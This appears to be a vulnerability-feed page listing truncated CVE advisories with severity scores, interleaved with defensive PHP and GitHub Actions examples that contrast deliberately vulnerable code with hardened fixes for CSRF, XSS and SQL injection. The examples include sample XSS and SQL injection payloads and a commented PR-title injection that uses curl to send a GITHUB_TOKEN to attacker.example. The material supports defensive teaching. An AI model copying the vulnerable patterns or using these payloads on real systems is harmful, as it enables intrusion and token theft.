PayPal Pay Now, Buy Now, Donation and Cart Buttons Shortcode <= 1.7 - Contributor+ Stored XSS
Description The plugin does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embedded, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks PoC [paypal_button...
AI Score 5.6 | EPSS 0.0004
An issue discovered in skycaiji 2.8 allows attackers to run arbitrary code via crafted POST request to...
AI Score 7.1 | EPSS 0.0004
This module will test ssh logins on a range of machines using a defined private key file, and report successful logins. If you have loaded a database plugin and connected to a database this module will record successful logins and hosts so you can track your access. Key files may be a single...
AI Score 7.1
[SECURITY] Fedora 39 Update: rust-uu_test-0.0.23-3.fc39
test ~ (uutils) evaluate comparison and file type...
AI Score 7.3
WooCommerce Swipe <= 2.7.1 - Cross-Site Scripting
A cross-site scripting vulnerability in test-plugin.php in the Swipe Checkout for WooCommerce plugin 2.7.1 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the api_url...
CVSS 6.1 | AI Score 6 | EPSS 0.001
Mirth Connect deserialization vulnerability
Added: 05/23/2024 Background Mirth Connect is an application which translates message standards for healthcare systems. Problem A deserialization vulnerability in Mirth Connect allows remote attackers to execute arbitrary commands by sending a specially crafted API request. Resolution Upgrade...
CVSS 9.8 | AI Score 8 | EPSS 0.956
JupyterLab is an extensible environment for interactive and reproducible computing, based on the Jupyter Notebook and Architecture. This vulnerability depends on user interaction by opening a malicious Markdown file using JupyterLab preview feature. A malicious user can access any data that the...
CVSS 6.5 | AI Score 6.8 | EPSS 0.001
Emlog pro2.3 is vulnerable to Cross Site Request Forgery (CSRF) via twitter.php which can be used with an XSS vulnerability to access administrator...
CVSS 6.5 | AI Score 6.2 | EPSS 0.001
wasm-interp v1.0.29 was discovered to contain an out-of-bounds read via the component...
CVSS 7.1 | AI Score 6.9 | EPSS 0.001
WebAssembly v1.0.29 was discovered to contain a segmentation fault via the component...
CVSS 5.5 | AI Score 5.8 | EPSS 0.001
Exploit for Out-of-bounds Write in Haxx Libcurl
CVE-2023-38545: Curl Vulnerability Proof of Concept This...
CVSS 9.8 | AI Score 9.5 | EPSS 0.003
WebAssembly v1.0.29 was discovered to contain a heap overflow via the component component...
CVSS 7.8 | AI Score 8 | EPSS 0.001
Exploit for OS Command Injection in PHP
CVE-2024-4577: Critical Vulnerability in PHP's CGI...
CVSS 9.8 | AI Score 9.8 | EPSS 0.967
CVE-2023-33733 on Reportlab v3.6.12 This lab was set up to...
CVSS 7.8 | AI Score 7.7 | EPSS 0.001
Use after free in Ozone in Google Chrome prior to 101.0.4951.41 allowed a remote attacker to potentially exploit heap corruption via running a Wayland...
CVSS 7.5 | AI Score 9.1 | EPSS 0.002
[SECURITY] Fedora 39 Update: wildcard-0.3.3-3.fc39
Wildcard gives you a nice and simple to use interface to test/practice regular...
AI Score 7.2
Percona XtraBackup vulnerability
Releases Ubuntu 18.04 ESM Ubuntu 16.04 ESM Packages percona-xtrabackup - Open source backup tool for InnoDB and XtraDB Details It was discovered that in Percona XtraBackup, a local crafted filename could trigger arbitrary code...
CVSS 7.8 | AI Score 7.6 | EPSS 0.0004
WebAssembly v1.0.29 was discovered to contain a segmentation fault via the component...
CVSS 5.5 | AI Score 5.8 | EPSS 0.0004
JupyterLab is an extensible environment for interactive and reproducible computing, based on the Jupyter Notebook and Architecture. Users of JupyterLab who click on a malicious link may get their Authorization and XSRFToken tokens exposed to a third party when running an older jupyter-server...
CVSS 7.6 | AI Score 6.7 | EPSS 0.001
AjaxDomainServlet in Zoho ManageEngine ServiceDesk Plus 10 allows User Enumeration. NOTE: the vendor's position is that this is intended...
AI Score 5.3 | EPSS 0.03
WebAssembly wat2wasm v1.0.32 allows attackers to cause a libc++abi.dylib crash by putting '@' before a quote...
CVSS 5.5 | AI Score 7 | EPSS 0.001
An issue in wasm2c 1.0.32, wasm2wat 1.0.32, wasm-decompile 1.0.32, and wasm-validate 1.0.32 allows attackers to cause a Denial of Service (DoS) via running a crafted...
CVSS 7.5 | AI Score 6.9 | EPSS 0.001
OpenCATS v0.9.6 was discovered to contain a SQL injection vulnerability via the tag_id variable in the Tag deletion...
CVSS 6.5 | AI Score 8.2 | EPSS 0.001
An open redirect vulnerability exposes OpenCATS to template injection due to improper validation of user-supplied GET...
CVSS 5.4 | AI Score 7.3 | EPSS 0.001
OpenCATS v0.9.6 was discovered to contain a SQL injection vulnerability via the importID parameter in the Import viewerrors...
CVSS 6.5 | AI Score 8.2 | EPSS 0.001
Garden provides automation for Kubernetes development and testing. Prior to versions 0.13.17 and 0.12.65, Garden has a dependency on the cryo library, which is vulnerable to code injection due to an insecure implementation of deserialization. Garden stores serialized objects using cryo in the...
CVSS 9 | AI Score 8 | EPSS 0.001
OpenCATS v0.9.6 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the entriesPerPage...
CVSS 6.1 | AI Score 6.1 | EPSS 0.001
Improper neutralization of input during web page generation allows an unauthenticated attacker to submit malicious Javascript as the answer to a questionnaire which would then be executed when an authenticated user reviews the candidate's submission. This could be used to steal other users’...
CVSS 6.1 | AI Score 7 | EPSS 0.001
Cross-site request forgery is facilitated by OpenCATS' failure to require CSRF tokens in POST requests. An attacker can exploit this issue by creating a dummy page that executes Javascript in an authenticated user's session when...
CVSS 5.4 | AI Score 7 | EPSS 0.001
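The missing check described in the OpenCATS CSRF entry above, as an added example that is not OpenCATS' own code: a synchronizer token is issued once per session and every state-changing POST handler refuses requests that do not carry it. `$session` and `$post` stand in for `$_SESSION` and `$_POST`, and the `candidateID` field, the candidate list and the handler names are assumptions, so the script runs from the command line (`php csrf.php`).

```php
<?php
declare(strict_types=1);
// Added example, not OpenCATS code: synchronizer-token CSRF protection for a
// state-changing POST handler. $session stands in for $_SESSION and $post for
// $_POST; the candidate list and field names are constructed for the demo.

// Issue one unguessable token per session and reuse it for every form.
function csrf_token(array &$session): string
{
    if (!isset($session['csrf']) || !is_string($session['csrf'])) {
        $session['csrf'] = bin2hex(random_bytes(32));
    }
    return $session['csrf'];
}

// Constant-time comparison; a missing or empty token never matches.
function csrf_valid(array $session, array $post): bool
{
    $expected = $session['csrf'] ?? '';
    $given    = $post['csrf'] ?? '';
    if (!is_string($expected) || !is_string($given) || $expected === '') {
        return false;
    }
    return hash_equals($expected, $given);
}

// Vulnerable handler: any POST that reaches it deletes the record, so a form
// auto-submitted from an attacker's page succeeds with the victim's cookie.
function delete_candidate_vulnerable(array $post, array &$candidates): bool
{
    unset($candidates[(int) ($post['candidateID'] ?? 0)]);
    return true;
}

// Hardened handler: the token lives in the victim's session and is echoed in a
// hidden form field; a cross-origin page cannot read it, so forged POSTs fail.
function delete_candidate_safe(array $session, array $post, array &$candidates): bool
{
    if (!csrf_valid($session, $post)) {
        return false; // a real controller would answer 403 here
    }
    unset($candidates[(int) ($post['candidateID'] ?? 0)]);
    return true;
}

// Constructed data: the victim's session and two candidate records.
$session    = [];
$candidates = [7 => 'Alice', 8 => 'Bob'];
$token      = csrf_token($session);

// A forged cross-site POST carries the candidate ID but no token.
$forged = ['candidateID' => '7'];
delete_candidate_vulnerable($forged, $candidates);
printf("vulnerable handler deleted record 7: %s\n", isset($candidates[7]) ? 'no' : 'yes');
printf("safe handler accepted forged POST: %s\n", delete_candidate_safe($session, $forged, $candidates) ? 'yes' : 'no');

// The site's own form includes the token from the session.
$legit = ['candidateID' => '8', 'csrf' => $token];
printf("safe handler accepted legitimate POST: %s\n", delete_candidate_safe($session, $legit, $candidates) ? 'yes' : 'no');
printf("records left: %d\n", count($candidates));
```

`hash_equals` matters here: a plain `===` on the token leaks timing, and treating an absent token as equal to an absent session value is the classic bypass, which is why the empty case is rejected explicitly.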
Improper neutralization of input during web page generation allows an authenticated attacker with access to a restricted account to submit malicious Javascript as the description for a calendar event, which would then be executed in other users' browsers if they browse to that event. This could...
CVSS 5.4 | AI Score 6.8 | EPSS 0.001
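The stored XSS pattern shared by the PayPal buttons shortcode entry at the top of this page and the two OpenCATS entries above (questionnaire answers, calendar event descriptions) is the same: attacker-supplied text is concatenated into markup without escaping for the context it lands in. The following is an added example, not the plugin's or OpenCATS' code. The helper names `esc_html_ctx` and `esc_url_ctx` and the button attributes are assumptions; WordPress's `esc_attr()`, `esc_html()` and `esc_url()` play the same roles inside a plugin.

```php
<?php
declare(strict_types=1);
// Added example, not code from the PayPal buttons plugin or OpenCATS: a shortcode
// handler that echoes attributes verbatim beside one that escapes each value for
// the context it is written into. Helper names are the author's, not WordPress's.

// Escape for an HTML text node or a double-quoted attribute value.
function esc_html_ctx(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// Escape for a URL attribute: allow only http(s), then escape for the attribute.
// Scheme filtering is what stops javascript: URLs; escaping alone does not.
function esc_url_ctx(string $s): string
{
    $s = trim($s);
    $scheme = parse_url($s, PHP_URL_SCHEME);
    if (!in_array(strtolower((string) $scheme), ['http', 'https'], true)) {
        return '';
    }
    return esc_html_ctx($s);
}

// Vulnerable: attribute values land in the page exactly as the contributor typed them.
function render_button_vulnerable(array $atts): string
{
    return '<a href="' . $atts['url'] . '" title="' . $atts['title'] . '">'
        . $atts['label'] . '</a>';
}

// Hardened: each value escaped for its own context (URL, attribute, text node).
function render_button_safe(array $atts): string
{
    return '<a href="' . esc_url_ctx($atts['url']) . '" title="' . esc_html_ctx($atts['title']) . '">'
        . esc_html_ctx($atts['label']) . '</a>';
}

// Constructed attacker-controlled shortcode attributes: one payload per context.
$atts = [
    'url'   => 'javascript:alert(document.cookie)',   // URL context
    'title' => '" onmouseover="alert(1)',               // attribute breakout
    'label' => '<img src=x onerror=alert(1)>',          // text-node injection
];

echo "vulnerable: ", render_button_vulnerable($atts), PHP_EOL;
echo "safe:       ", render_button_safe($atts), PHP_EOL;
```

The hardened output keeps the payloads as inert text: the `"` that would have closed the `title` attribute becomes `&quot;`, the `<img>` tag is rendered as characters rather than an element, and the `javascript:` link is dropped entirely because it fails the scheme allowlist.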
OpenCATS v0.9.6 was discovered to contain a SQL injection vulnerability via the entriesPerPage...
CVSS 6.5 | AI Score 8.2 | EPSS 0.001
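The three OpenCATS SQL injection entries on this page (`tag_id`, `importID`, `entriesPerPage`) all come down to a request parameter spliced into statement text. As an added example that is not OpenCATS' code, the tag deletion case with a constructed in-memory SQLite table (via PDO, so it runs with `php sqli.php` wherever `pdo_sqlite` is present); the table layout and the function names are assumptions.

```php
<?php
declare(strict_types=1);
// Added example, not OpenCATS code. The tag table and its rows are constructed
// here; tag_id plays the role of the request parameter named in the advisory.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);

function seed(PDO $db): void
{
    $db->exec('DROP TABLE IF EXISTS tag');
    $db->exec('CREATE TABLE tag (tag_id INTEGER PRIMARY KEY, title TEXT NOT NULL)');
    $db->exec("INSERT INTO tag (tag_id, title) VALUES (1, 'java'), (2, 'php'), (3, 'remote')");
}

// Vulnerable: the parameter is interpolated into the statement text, so the
// attacker rewrites the WHERE clause (here, to delete every tag).
function delete_tag_vulnerable(PDO $db, string $tagId): int
{
    return $db->exec("DELETE FROM tag WHERE tag_id = $tagId");
}

// Hardened: validate the shape, then bind the value so it can only ever be data.
function delete_tag_safe(PDO $db, string $tagId): int
{
    if (!ctype_digit($tagId)) {
        throw new InvalidArgumentException('tag_id must be a decimal integer');
    }
    $stmt = $db->prepare('DELETE FROM tag WHERE tag_id = :id');
    $stmt->bindValue(':id', (int) $tagId, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->rowCount();
}

$payload = '1 OR 1=1'; // constructed: what ?tag_id=1+OR+1%3D1 decodes to

seed($db);
printf("vulnerable: %d rows deleted with tag_id=\"%s\"\n", delete_tag_vulnerable($db, $payload), $payload);

seed($db);
try {
    delete_tag_safe($db, $payload);
} catch (InvalidArgumentException $e) {
    printf("safe: rejected (%s)\n", $e->getMessage());
}
printf("safe: %d row deleted with tag_id=\"2\"\n", delete_tag_safe($db, '2'));
```

The prepared statement is the actual fix; the `ctype_digit` check in front of it is defence in depth that also gives a clean 400-style error instead of a database exception for malformed input.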
Exploit for Code Injection in Openplcproject Openplc V3 Firmware
CVE-2021-31630 Exploit CVE-2021-31630 Exploit PoC for...
CVSS 8.8 | AI Score 8.5 | EPSS 0.006
** UNSUPPORTED WHEN ASSIGNED ** The value set as the DefaultLocaleResolver.LOCALE_KEY attribute on the session was not validated while resolving XML definition files, leading to possible path traversal and eventually SSRF/XXE when passing user-controlled data to this key. Passing user-controlled...
CVSS 7.5 | AI Score 6.2 | EPSS 0.001
Cross-Site Request Forgery (CSRF) vulnerability in Rocket Elements Split Test For Elementor. This issue affects Split Test For Elementor: from n/a through...
CVSS 4.3 | AI Score 5 | EPSS 0.0004
Galaxy is an open-source platform for data analysis. An arbitrary file read exists in Galaxy 22.01 and Galaxy 22.05 due to the switch to Gunicorn, which can be used to read any file accessible to the operating system user under which Galaxy is running. This vulnerability affects Galaxy 22.01 and...
CVSS 8.6 | AI Score 6.9 | EPSS 0.001
Opencats v0.9.7 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the component...
CVSS 6.1 | AI Score 6.1 | EPSS 0.001
gradio is vulnerable to Command Injection. The vulnerability is due to improper neutralization of special elements within the test-functional.yml CI workflow, which results in unauthorized modification of the base repository or exfiltration of the GITHUB_TOKEN, COMMENT_TOKEN, or...
CVSS 7.5 | AI Score 6.7 | EPSS 0.0004
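The injection class named in the gradio entry above is a GitHub Actions expression expanded into a `run:` script. The workflow below is an added illustration, not gradio's actual test-functional.yml: the trigger, job names and the use of the pull request title as the injected field are assumptions. The weak job and the corrected job are shown side by side.

```yaml
# Added example, not the gradio project's workflow. With pull_request_target the
# job runs with the base repository's GITHUB_TOKEN, so anything an outside
# contributor controls (PR title, body, branch name, commit message) is
# attacker input.
on:
  pull_request_target:
    types: [opened, edited]

jobs:
  weak:
    runs-on: ubuntu-latest
    steps:
      # The expression is substituted into the script text before bash parses it.
      # A title such as   x"; curl https://attacker.example/?t=$GITHUB_TOKEN; echo "
      # therefore becomes part of the command line and runs with the job's token.
      - run: echo "Testing ${{ github.event.pull_request.title }}"

  fixed:
    runs-on: ubuntu-latest
    # Least privilege: a test job does not need write access to the repository.
    permissions:
      contents: read
    steps:
      # The value is passed through an environment variable, so bash only ever
      # sees it as data; quoting the expansion keeps word splitting out too.
      - env:
          PR_TITLE: ${{ github.event.pull_request.title }}
        run: echo "Testing $PR_TITLE"
```

The same rule applies to every `${{ }}` expansion of event data inside `run:`, and to scripts invoked through `actions/github-script`; pairing it with a read-only `permissions:` block limits what a successful injection could do with the token.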
libmodbus is vulnerable to a Use After Free. The vulnerability is caused by improper handling of the ctx->backend pointer, which allows attackers to cause a Denial of Service (DoS) via a crafted message sent to the...
AI Score 6.4
In the Linux kernel, the following vulnerability has been resolved: ACPI: CPPC: Use access_width over bit_width for system memory accesses To align with ACPI 6.3+, since bit_width can be any 8-bit value, it cannot be depended on to be always on a clean 8b boundary. This was uncovered on the...
AI Score 7.3 | EPSS 0.0004
OpenCATS v0.9.6 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the joborderID...
CVSS 6.1 | AI Score 6.1 | EPSS 0.001
This repository hosts source code implementing the Trusted Computing Group's (TCG) TPM2 Software Stack (TSS). The JSON Quote Info returned by Fapi_Quote has to be deserialized by Fapi_VerifyQuote to the TPM Structure TPMS_ATTEST. For the field TPM2_GENERATED magic of this structure any number can...
CVSS 4.3 | AI Score 6.8 | EPSS 0.0004